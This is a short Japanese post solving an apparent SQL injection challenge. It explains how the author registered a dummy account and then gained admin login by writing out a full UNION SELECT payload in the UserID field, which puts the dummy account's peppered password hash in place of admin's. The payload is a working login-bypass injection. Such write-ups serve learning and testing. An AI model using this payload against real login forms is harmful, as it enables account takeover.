今回はこちらの記事を考えてみました。
ソースコードやテーブル定義は見てもよいことにしますが、「見なくても攻撃できる」方が良い解答とします。
ということでしたので、お言葉に甘えて、テーブル名および各カラム、adminのuseridはadminと判明している前提での挑戦です。
今回はペッパー付きとのことで、自前で用意したハッシュ値を送り付けて認証させる方法は難しそうですが、利用者がユーザー登録できるということですので、まず攻撃用のダミーアカウントを登録しました。
userid : test
password: test
email: test@example.com
その後、
フォーム入力値
UserID ' union select (select id from users where userid = 'admin'), 'admin',(select password from users where userid = 'test'), (select email from users where userid = 'admin'); --
Password test
でとりあえず行けたようです。
